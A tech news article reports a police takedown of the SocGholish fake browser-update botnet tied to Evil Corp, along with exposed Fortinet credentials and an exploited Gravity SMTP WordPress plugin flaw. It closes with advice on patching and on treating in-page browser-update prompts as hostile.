Future TechnologyFuture Technology
Cybersecurity

Police just seized 106 servers from a botnet that ran for a decade

· 4 min read · By Nath Connell

Key takeaways

  • Authorities seized 106 servers from SocGholish, a malware operation tied to Russian cybercrime group Evil Corp
  • The takedown cleaned roughly 15,000 legitimate WordPress sites quietly hijacked to push fake browser-update malware
  • SocGholish was a front door for ransomware and data theft for years; Evil Corp has survived sanctions since 2019
  • Practical takeaway: patch WordPress and its plugins now, a Gravity SMTP flaw on around 100,000 sites is being actively exploited
A dark screen showing security and code, representing a cyber takedown
A dark screen showing security and code, representing a cyber takedown

Investigators have disrupted SocGholish, one of the longest-running malware operations on the internet. They seized 106 servers and cleaned roughly 15,000 legitimate WordPress sites that had been quietly hijacked to spread it. For a threat that has been active for the better part of a decade, that is a serious dent.

How SocGholish worked

SocGholish was an initial access broker. It did not run the ransomware itself, it sold the way in. Its method was the fake browser update: you visit a normal, trusted website that has been subtly compromised, and a convincing pop-up tells you your browser needs updating. Click it, and instead of an update you download a malware loader that opens the door for whatever comes next.

Those next steps were rarely small. SocGholish has been the front door for ransomware deployments, data theft and corporate espionage for years, tied to the Russian cybercrime group Evil Corp. Evil Corp has been under US Treasury sanctions since 2019, and has stayed in business by rebranding and changing tactics every time it gets hit. This takedown matters, but nobody serious is calling it a finishing blow.

The future, in 3 minutes a day. The biggest tech story explained every morning, free. Get the briefing →

Why this should land on your to-do list

Two reasons. First, those 15,000 hijacked sites were ordinary WordPress installs whose owners had no idea they were serving malware to their own visitors. If you run a site, you could be the unwitting middleman in an attack like this.

Second, the same week brought a reminder that the basics are still where most breaches start. Researchers logged 86,644 Fortinet devices with compromised credentials, with generic admin accounts and built-in system accounts making up most of them. And a patched flaw in the Gravity SMTP WordPress plugin, installed on around 100,000 sites, is being actively exploited to pull API keys and OAuth tokens.

The practical version of all this fits on a sticky note. Update WordPress and every plugin now, especially Gravity SMTP. Treat any pop-up telling you to update your browser as hostile and close the tab. Real browser updates do not arrive through a website. Takedowns make headlines, but credential hygiene and patching are what actually keep you out of the next one.

Sources